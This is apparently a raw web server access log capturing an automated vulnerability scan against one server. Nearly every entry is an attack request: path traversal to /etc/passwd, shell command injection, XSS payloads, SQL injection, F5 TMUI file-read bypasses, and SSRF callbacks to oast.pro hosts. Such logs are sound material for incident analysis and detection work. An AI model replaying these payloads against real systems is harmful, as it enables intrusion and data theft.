Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 360 2023-11-09 22:23:30 103.153.214.94 GET /s/2XwZKjLzKVsfSpwNWLo5bwIbrJQ/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 368 2023-11-09 22:23:33 103.153.214.94 GET /s/2XwZKjLzKVsfSpwNWLo5bwIbrJQ/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 1033 2023-11-09 22:23:35 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/detail.php subdomain=cl6fbhsfe7k9sg331pogomysr1cfyhoo3.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 363 2023-11-09 22:23:37 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/get.php subdomain=cl6fbhsfe7k9sg331pog9e53bc774gh7y.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 364 2023-11-09 22:23:41 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/tree.php subdomain=cl6fbhsfe7k9sg331pog4c6xng9wd956u.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 365 2023-11-09 22:23:55 103.153.214.94 GET /searchblox/servlet/FileServlet col=9&url=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 367 2023-11-09 22:24:02 103.153.214.94 GET /wp-content/plugins/easy-wp-smtp/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 391 2023-11-09 22:24:04 103.153.214.94 GET /wp-content/plugins/wp-mail-smtp-pro/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 362 2023-11-09 22:24:12 103.153.214.94 POST /goform/setSysAdm - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn/login.shtml 405 0 1 1481 2023-11-09 22:24:21 103.153.214.94 GET /advanced_component_system/index.php ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 364 2023-11-09 22:24:33 103.153.214.94 POST /actions/authenticate.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 364 2023-11-09 22:25:02 103.153.214.94 GET /+CSCOT+/translation-table type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 11 0 362 2023-11-09 22:25:09 103.153.214.94 GET /+CSCOT+/oem-customization app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 11 0 1510 2023-11-09 22:28:21 103.153.214.94 POST /auth/check - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 1469 2023-11-09 22:28:44 103.153.214.94 GET /admin/histograms h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 301 0 0 1104 2023-11-09 22:28:48 103.153.214.94 POST /+CSCOE+/saml/sp/acs tgname=a 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 11 0 365 2023-11-09 22:29:12 103.153.214.94 POST /auth/newpassword - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 1474 2023-11-09 22:30:54 103.153.214.94 POST /auth/requestreset - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 363 2023-11-09 22:30:57 103.153.214.94 POST /auth/requestreset - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 374 2023-11-09 22:31:34 103.153.214.94 GET /index.php module=users/login 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 361 2023-11-09 22:32:17 103.153.214.94 GET /index.php module=users/login 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 374 2023-11-09 22:32:32 103.153.214.94 GET /ebook/bookPerPub.php pubid=4' 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 361 2023-11-09 22:32:40 103.153.214.94 GET /wp-content/plugins/quiz-master-next/README.md - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 373 2023-11-09 22:32:43 103.153.214.94 GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 366 2023-11-09 22:33:12 103.153.214.94 GET /backend/admin/common/clearcache previousUrl=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 22:33:12 103.153.214.94 GET /index.php module=users/login 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 366 2023-11-09 22:33:22 103.153.214.94 GET /index.php module=users/login 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 364 2023-11-09 22:33:30 103.153.214.94 GET /wp-admin/admin-ajax.php action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 400 2023-11-09 22:35:54 103.153.214.94 POST /os/mxperson - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 362 2023-11-09 22:35:58 103.153.214.94 POST /meaweb/os/mxperson - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 1486 2023-11-09 22:36:06 103.153.214.94 GET /_next/server/pages-manifest.json - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 364 2023-11-09 22:36:13 103.153.214.94 GET /secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 22:36:17 103.153.214.94 GET /jira/secure/QueryComponentRendererValue!Default.jspa assignee=user:admin 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 1097 2023-11-09 22:38:12 103.153.214.94 GET /a/b/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 11 0 373 2023-11-09 22:38:16 103.153.214.94 GET /proxy.stream origin=http://cl6fbhsfe7k9sg331pog3bih7wxmbdaop.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 361 2023-11-09 22:38:16 103.153.214.94 POST /dfsms/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 362 2023-11-09 22:38:17 103.153.214.94 GET /external_content/retrieve/oembed endpoint=http://cl6fbhsfe7k9sg331pogx63siaz1cs45o.oast.pro&url=foo 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 362 2023-11-09 22:38:33 103.153.214.94 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#foo/development - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 11 0 367 2023-11-09 22:39:01 103.153.214.94 GET /index.php/catalogsearch/advanced/result/ name=e 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 363 2023-11-09 22:39:51 103.153.214.94 GET /webGui/images/green-on.png/ path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 22:39:56 103.153.214.94 POST /EemAdminService/EemAdmin - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 363 2023-11-09 22:40:02 103.153.214.94 GET / lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 403 2023-11-09 22:41:48 103.153.214.94 POST /AdminTools/querybuilder/logon framework 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 0 2 377 2023-11-09 22:41:51 103.153.214.94 POST /CTCWebService/CTCWebServiceBean/ConfigServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 363 2023-11-09 22:42:42 103.153.214.94 POST /magmi/web/magmi_saveprofile.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 362 2023-11-09 22:42:47 103.153.214.94 POST /magmi/web/magmi_run.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 364 2023-11-09 22:42:50 103.153.214.94 GET /magmi/web/info.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 361 2023-11-09 22:44:24 103.153.214.94 GET / Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 393 2023-11-09 22:45:38 103.153.214.94 GET /linuxki/experimental/vis/kivis.php type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 390 2023-11-09 22:45:52 103.153.214.94 POST /session/create - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 368 2023-11-09 22:45:54 103.153.214.94 GET /PolicyMgmt/policyDetailsCard.do poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 387 2023-11-09 22:45:54 103.153.214.94 GET /zimlet/com_zimbra_webex/httpPost.jsp companyId=http://cl6fbhsfe7k9sg331pogzmr6mfhciwpfc.oast.pro%23 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 1028 2023-11-09 22:46:17 103.153.214.94 GET /metrics/v1/mbeans - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 364 2023-11-09 22:46:18 103.153.214.94 POST /account/index.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 361 2023-11-09 22:46:21 103.153.214.94 POST /opensis/index.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 373 2023-11-09 22:46:24 103.153.214.94 POST /index.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 359 2023-11-09 22:47:11 103.153.214.94 GET /www/delivery/afr.php refresh=10000&")',10000000);alert(1337);setTimeout('alert(" 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 387 2023-11-09 22:47:23 103.153.214.94 POST /menu/stapp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 362 2023-11-09 22:47:32 103.153.214.94 POST /cgi-bin/libagent.cgi type=J 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 361 2023-11-09 22:47:49 103.153.214.94 GET / IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 367 2023-11-09 22:48:13 103.153.214.94 GET /menu/guiw nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 361 2023-11-09 22:48:37 103.153.214.94 GET /javax.faces.resources/web.xml.jsf loc=/../../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 387 2023-11-09 22:48:38 103.153.214.94 GET /javax.faces.resources/web.xml.jsf con=/../../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 360 2023-11-09 22:48:41 103.153.214.94 GET /javax.faces.resources/faces-config.xml.jsf loc=/../../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 362 2023-11-09 22:48:44 103.153.214.94 GET /javax.faces.resources/faces-config.xml.jsf con=/../../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 360 2023-11-09 22:48:51 103.153.214.94 GET /pandora_console/attachment/pandora_chat.log.json.txt - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 362 2023-11-09 22:49:28 103.153.214.94 GET /jsp/help-sb-download.jsp sbFileName=../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 367 2023-11-09 22:49:39 103.153.214.94 GET /webmail/ color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 371 2023-11-09 22:50:13 103.153.214.94 POST /api/jsonws/invoke - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 414 2023-11-09 22:50:18 103.153.214.94 POST /api/jsonws/invoke - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 2547 2023-11-09 22:51:27 103.153.214.94 POST /cgi-bin/mainfunction.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 373 2023-11-09 22:51:53 103.153.214.94 GET /index.php page_slug=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 367 2023-11-09 22:52:21 103.153.214.94 GET /css/eonweb.css - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 392 2023-11-09 22:53:13 103.153.214.94 GET /index.php app=main&inc=core_auth&route=login 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 363 2023-11-09 22:54:40 103.153.214.94 GET /graph_realtime.php action=init 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 367 2023-11-09 22:54:54 103.153.214.94 GET /XmlPeek.aspx dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 388 2023-11-09 22:55:24 103.153.214.94 POST /pcidss/report type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 362 2023-11-09 22:55:27 103.153.214.94 GET /index.php v=d&p=%22;alert(document.domain);%22 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 362 2023-11-09 22:55:27 103.153.214.94 GET /menu/ss sid=nsroot&username=nsroot&force_setup=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 361 2023-11-09 22:55:30 103.153.214.94 GET /menu/neo - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 362 2023-11-09 22:55:33 103.153.214.94 GET /menu/stc - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 371 2023-11-09 22:56:02 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 368 2023-11-09 22:56:06 103.153.214.94 GET /wp-admin/index.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 363 2023-11-09 22:56:06 103.153.214.94 GET /version.web - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 376 2023-11-09 22:56:06 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 362 2023-11-09 22:56:10 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/etc/f5-release 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 366 2023-11-09 22:56:13 103.153.214.94 GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp fileName=/config/bigip.license 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 381 2023-11-09 22:56:19 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 368 2023-11-09 22:56:24 103.153.214.94 POST /tmui/locallb/workspace/fileSave.jsp - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 365 2023-11-09 22:56:29 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 1573 2023-11-09 22:56:31 103.153.214.94 POST /tmui/locallb/workspace/tmshCmd.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 363 2023-11-09 22:57:00 103.153.214.94 GET /cgi-bin/weblogin.cgi username=admin';cat+/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 371 2023-11-09 22:57:37 103.153.214.94 GET / q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 371 2023-11-09 22:57:49 103.153.214.94 GET /settings.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 366 2023-11-09 22:58:04 103.153.214.94 POST /getcfg.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 363 2023-11-09 22:58:13 103.153.214.94 GET / author=1 443 - 101.35.195.134 